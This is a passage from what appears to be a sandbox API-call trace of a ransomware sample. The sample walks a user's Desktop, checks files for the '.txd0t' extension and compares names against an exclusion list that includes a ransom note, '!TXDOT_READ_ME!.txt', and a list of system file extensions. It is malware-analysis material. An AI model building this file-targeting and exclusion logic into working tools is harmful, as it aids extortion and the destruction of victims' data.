psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="5WpFV5we BjOWCFQ_8P.png.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\5WpFV5we BjOWCFQ_8P.png.txd0t" [0090.048] PathFindExtensionW (pszPath="5WpFV5we BjOWCFQ_8P.png.txd0t") returned=".txd0t" [0090.048] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.048] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x376e3d90, ftCreationTime.dwHighDateTime=0x1d5e688, ftLastAccessTime.dwLowDateTime=0x485dd3a0, ftLastAccessTime.dwHighDateTime=0x1d5e24f, ftLastWriteTime.dwLowDateTime=0x506fa698, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x49f1, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="7SFq.jpg.txd0t", cAlternateFileName="7SFQJP~1.TXD")) returned 1 [0090.048] StrCmpW (psz1="7SFq.jpg.txd0t", psz2=".") returned 1 [0090.048] StrCmpW (psz1="7SFq.jpg.txd0t", psz2="..") returned 1 [0090.048] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="7SFq.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\7SFq.jpg.txd0t" [0090.048] PathFindExtensionW (pszPath="7SFq.jpg.txd0t") returned=".txd0t" [0090.048] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.048] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x61556450, ftCreationTime.dwHighDateTime=0x1d5e686, ftLastAccessTime.dwLowDateTime=0xaf323a40, ftLastAccessTime.dwHighDateTime=0x1d5e177, ftLastWriteTime.dwLowDateTime=0x5072091b, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x30f9, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="8dOKYe-qP.odt.txd0t", cAlternateFileName="8DOKYE~1.TXD")) returned 1 [0090.048] StrCmpW (psz1="8dOKYe-qP.odt.txd0t", psz2=".") returned 1 [0090.048] StrCmpW (psz1="8dOKYe-qP.odt.txd0t", psz2="..") returned 1 [0090.048] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="8dOKYe-qP.odt.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\8dOKYe-qP.odt.txd0t" [0090.048] PathFindExtensionW (pszPath="8dOKYe-qP.odt.txd0t") returned=".txd0t" [0090.048] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.048] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x177c8af0, ftCreationTime.dwHighDateTime=0x1d5e304, ftLastAccessTime.dwLowDateTime=0x2eadcbd0, ftLastAccessTime.dwHighDateTime=0x1d5e25f, ftLastWriteTime.dwLowDateTime=0x50749f18, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14903, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="aqQlS_nJ46AyT-L-zj.swf.txd0t", cAlternateFileName="AQQLS_~1.TXD")) returned 1 [0090.048] StrCmpW (psz1="aqQlS_nJ46AyT-L-zj.swf.txd0t", psz2=".") returned 1 [0090.048] StrCmpW (psz1="aqQlS_nJ46AyT-L-zj.swf.txd0t", psz2="..") returned 1 [0090.048] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.048] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="aqQlS_nJ46AyT-L-zj.swf.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\aqQlS_nJ46AyT-L-zj.swf.txd0t" [0090.049] PathFindExtensionW (pszPath="aqQlS_nJ46AyT-L-zj.swf.txd0t") returned=".txd0t" [0090.049] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.049] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87888bb0, ftCreationTime.dwHighDateTime=0x1d5e20e, ftLastAccessTime.dwLowDateTime=0xae94e950, ftLastAccessTime.dwHighDateTime=0x1d5e51b, ftLastWriteTime.dwLowDateTime=0x50749f18, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x948a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="BBeZnteC-7.mp3.txd0t", cAlternateFileName="BBEZNT~1.TXD")) returned 1 [0090.049] StrCmpW (psz1="BBeZnteC-7.mp3.txd0t", psz2=".") returned 1 [0090.049] StrCmpW (psz1="BBeZnteC-7.mp3.txd0t", psz2="..") returned 1 [0090.049] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.049] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.049] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="BBeZnteC-7.mp3.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\BBeZnteC-7.mp3.txd0t" [0090.049] PathFindExtensionW (pszPath="BBeZnteC-7.mp3.txd0t") returned=".txd0t" [0090.049] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.049] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97a3c340, ftCreationTime.dwHighDateTime=0x1d5e121, ftLastAccessTime.dwLowDateTime=0x9bb095a0, ftLastAccessTime.dwHighDateTime=0x1d5e9f8, ftLastWriteTime.dwLowDateTime=0x5076cdac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x5554, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="Cb9DBpMZ2 ZiZd.jpg.txd0t", cAlternateFileName="CB9DBP~1.TXD")) returned 1 [0090.049] StrCmpW (psz1="Cb9DBpMZ2 ZiZd.jpg.txd0t", psz2=".") returned 1 [0090.049] StrCmpW (psz1="Cb9DBpMZ2 ZiZd.jpg.txd0t", psz2="..") returned 1 [0090.049] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.049] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.049] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="Cb9DBpMZ2 ZiZd.jpg.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\Cb9DBpMZ2 ZiZd.jpg.txd0t" [0090.049] PathFindExtensionW (pszPath="Cb9DBpMZ2 ZiZd.jpg.txd0t") returned=".txd0t" [0090.049] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.049] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81c9bb00, ftCreationTime.dwHighDateTime=0x1d5e7c6, ftLastAccessTime.dwLowDateTime=0xadea1ed0, ftLastAccessTime.dwHighDateTime=0x1d5eee9, ftLastWriteTime.dwLowDateTime=0x5076cdac, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xcd5f, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="CyLY.bmp.txd0t", cAlternateFileName="CYLYBM~1.TXD")) returned 1 [0090.049] StrCmpW (psz1="CyLY.bmp.txd0t", psz2=".") returned 1 [0090.049] StrCmpW (psz1="CyLY.bmp.txd0t", psz2="..") returned 1 [0090.049] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.049] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.049] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="CyLY.bmp.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\CyLY.bmp.txd0t" [0090.049] PathFindExtensionW (pszPath="CyLY.bmp.txd0t") returned=".txd0t" [0090.049] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.049] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2e49bf0, ftCreationTime.dwHighDateTime=0x1d5e5d9, ftLastAccessTime.dwLowDateTime=0xff29c150, ftLastAccessTime.dwHighDateTime=0x1d5e1e3, ftLastWriteTime.dwLowDateTime=0x50792fe4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x49e2, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="DE3scvajpXnclcE34.xls.txd0t", cAlternateFileName="DE3SCV~1.TXD")) returned 1 [0090.049] StrCmpW (psz1="DE3scvajpXnclcE34.xls.txd0t", psz2=".") returned 1 [0090.049] StrCmpW (psz1="DE3scvajpXnclcE34.xls.txd0t", psz2="..") returned 1 [0090.049] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.049] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.049] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="DE3scvajpXnclcE34.xls.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\DE3scvajpXnclcE34.xls.txd0t" [0090.049] PathFindExtensionW (pszPath="DE3scvajpXnclcE34.xls.txd0t") returned=".txd0t" [0090.049] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.050] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x440792d0, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x440792d0, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0xce389e99, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0090.050] StrCmpW (psz1="desktop.ini", psz2=".") returned 1 [0090.050] StrCmpW (psz1="desktop.ini", psz2="..") returned 1 [0090.050] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x51e2a550, ftCreationTime.dwHighDateTime=0x1d5eca3, ftLastAccessTime.dwLowDateTime=0xc61bbc60, ftLastAccessTime.dwHighDateTime=0x1d5e828, ftLastWriteTime.dwLowDateTime=0x50792fe4, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16ae, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="GHZr_0qE96Rjj.avi.txd0t", cAlternateFileName="GHZR_0~1.TXD")) returned 1 [0090.050] StrCmpW (psz1="GHZr_0qE96Rjj.avi.txd0t", psz2=".") returned 1 [0090.050] StrCmpW (psz1="GHZr_0qE96Rjj.avi.txd0t", psz2="..") returned 1 [0090.050] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.050] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.050] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="GHZr_0qE96Rjj.avi.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\GHZr_0qE96Rjj.avi.txd0t" [0090.050] PathFindExtensionW (pszPath="GHZr_0qE96Rjj.avi.txd0t") returned=".txd0t" [0090.050] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.050] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8d77c440, ftCreationTime.dwHighDateTime=0x1d5ec46, ftLastAccessTime.dwLowDateTime=0x28888e60, ftLastAccessTime.dwHighDateTime=0x1d5e8aa, ftLastWriteTime.dwLowDateTime=0x507b93c9, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xc217, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="jhscRm6vvE.csv.txd0t", cAlternateFileName="JHSCRM~1.TXD")) returned 1 [0090.050] StrCmpW (psz1="jhscRm6vvE.csv.txd0t", psz2=".") returned 1 [0090.050] StrCmpW (psz1="jhscRm6vvE.csv.txd0t", psz2="..") returned 1 [0090.050] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.050] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.050] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="jhscRm6vvE.csv.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\jhscRm6vvE.csv.txd0t" [0090.050] PathFindExtensionW (pszPath="jhscRm6vvE.csv.txd0t") returned=".txd0t" [0090.050] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.050] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2255f40, ftCreationTime.dwHighDateTime=0x1d5ed83, ftLastAccessTime.dwLowDateTime=0x5f6fb860, ftLastAccessTime.dwHighDateTime=0x1d5f01e, ftLastWriteTime.dwLowDateTime=0x507df3de, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x1727a, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="K7u1HHJ_-wyjZGJCddO.doc.txd0t", cAlternateFileName="K7U1HH~1.TXD")) returned 1 [0090.050] StrCmpW (psz1="K7u1HHJ_-wyjZGJCddO.doc.txd0t", psz2=".") returned 1 [0090.050] StrCmpW (psz1="K7u1HHJ_-wyjZGJCddO.doc.txd0t", psz2="..") returned 1 [0090.050] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.050] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.050] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="K7u1HHJ_-wyjZGJCddO.doc.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\K7u1HHJ_-wyjZGJCddO.doc.txd0t" [0090.050] PathFindExtensionW (pszPath="K7u1HHJ_-wyjZGJCddO.doc.txd0t") returned=".txd0t" [0090.050] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.050] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa575a7d0, ftCreationTime.dwHighDateTime=0x1d5e5aa, ftLastAccessTime.dwLowDateTime=0x34fdb140, ftLastAccessTime.dwHighDateTime=0x1d5ecb3, ftLastWriteTime.dwLowDateTime=0x507df3de, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xa51c, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="lDvQFP7B58nzHOr.m4a.txd0t", cAlternateFileName="LDVQFP~1.TXD")) returned 1 [0090.050] StrCmpW (psz1="lDvQFP7B58nzHOr.m4a.txd0t", psz2=".") returned 1 [0090.050] StrCmpW (psz1="lDvQFP7B58nzHOr.m4a.txd0t", psz2="..") returned 1 [0090.050] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.050] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.050] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="lDvQFP7B58nzHOr.m4a.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\lDvQFP7B58nzHOr.m4a.txd0t" [0090.050] PathFindExtensionW (pszPath="lDvQFP7B58nzHOr.m4a.txd0t") returned=".txd0t" [0090.051] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.051] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2419ea80, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x2419ea80, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x22502700, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x27000, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="mspusf.exe", cAlternateFileName="")) returned 1 [0090.051] StrCmpW (psz1="mspusf.exe", psz2=".") returned 1 [0090.051] StrCmpW (psz1="mspusf.exe", psz2="..") returned 1 [0090.051] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.051] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.051] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="mspusf.exe", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\mspusf.exe") returned="C:\\Users\\FD1HVy\\Desktop\\mspusf.exe" [0090.051] PathFindExtensionW (pszPath="mspusf.exe") returned=".exe" [0090.051] StrCmpW (psz1=".exe", psz2=".txd0t") returned -1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="bootsect.bak") returned 1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="iconcache.db") returned 1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="thumbs.db") returned -1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2=" ransomware ") returned 1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2=" ransom ") returned 1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="debug.txt") returned 1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="boot.ini") returned 1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="desktop.ini") returned 1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="autorun.inf") returned 1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="ntuser.dat") returned -1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="ntldr") returned -1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="ntdetect.com") returned -1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="bootfont.bin") returned 1 [0090.051] StrCmpIW (psz1="mspusf.exe", psz2="!TXDOT_READ_ME!.txt") returned 1 [0090.051] PathFindExtensionW (pszPath="mspusf.exe") returned=".exe" [0090.051] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".exe") returned=".exe|.bat|.cmd|.url|.mui" [0090.051] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe0152430, ftCreationTime.dwHighDateTime=0x1d5edf5, ftLastAccessTime.dwLowDateTime=0xc2c01df0, ftLastAccessTime.dwHighDateTime=0x1d5f02e, ftLastWriteTime.dwLowDateTime=0x50a8df2a, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x14166, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OifmxvKJj07hQoi0y.ppt.txd0t", cAlternateFileName="OIFMXV~1.TXD")) returned 1 [0090.051] StrCmpW (psz1="OifmxvKJj07hQoi0y.ppt.txd0t", psz2=".") returned 1 [0090.051] StrCmpW (psz1="OifmxvKJj07hQoi0y.ppt.txd0t", psz2="..") returned 1 [0090.051] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.051] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.051] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="OifmxvKJj07hQoi0y.ppt.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\OifmxvKJj07hQoi0y.ppt.txd0t" [0090.051] PathFindExtensionW (pszPath="OifmxvKJj07hQoi0y.ppt.txd0t") returned=".txd0t" [0090.051] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.051] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x26b5ea80, ftCreationTime.dwHighDateTime=0x1d5e858, ftLastAccessTime.dwLowDateTime=0x79ba9ae0, ftLastAccessTime.dwHighDateTime=0x1d5efb1, ftLastWriteTime.dwLowDateTime=0x508059ca, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x16085, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="oIyEk1tbor7X9s.bmp.txd0t", cAlternateFileName="OIYEK1~1.TXD")) returned 1 [0090.052] StrCmpW (psz1="oIyEk1tbor7X9s.bmp.txd0t", psz2=".") returned 1 [0090.052] StrCmpW (psz1="oIyEk1tbor7X9s.bmp.txd0t", psz2="..") returned 1 [0090.052] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.052] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\") returned="C:\\Users\\FD1HVy\\Desktop\\" [0090.052] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop\\", psz2="oIyEk1tbor7X9s.bmp.txd0t", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp.txd0t") returned="C:\\Users\\FD1HVy\\Desktop\\oIyEk1tbor7X9s.bmp.txd0t" [0090.052] PathFindExtensionW (pszPath="oIyEk1tbor7X9s.bmp.txd0t") returned=".txd0t" [0090.052] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0090.052] FindNextFileW (in: hFindFile=0xec2330, lpFindFileData=0x561f210 | out: lpFindFileData=0x561f210*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xecf7020, ftCreationTime.dwHighDateTime=0x1d5f060, ftLastAccessTime.dwLowDateTime=0xb76abe30, ftLastAccessTime.dwHighDateTime=0x1d5ee2e, ftLastWriteTime.dwLowDateTime=0x5082b988, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0xaef5, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="OO_s81.avi.txd0t", cAlternateFileName="OO_S81~1.TXD")) returned 1 [0090.052] StrCmpW (psz1="OO_s81.avi.txd0t", psz2=".") returned 1 [0090.052] StrCmpW (psz1="OO_s81.avi.txd0t", psz2="..") returned 1 [0090.052] StrCpyNW (in: psz1=0xec75a0, psz2="C:\\Users\\FD1HVy\\Desktop", cchMax=1072 | out: psz1="C:\\Users\\FD1HVy\\Desktop") returned="C:\\Users\\FD1HVy\\Desktop" [0090.052] StrNCatW (in: psz1="C:\\Users\\FD1HVy\\Desktop", psz2="\\", 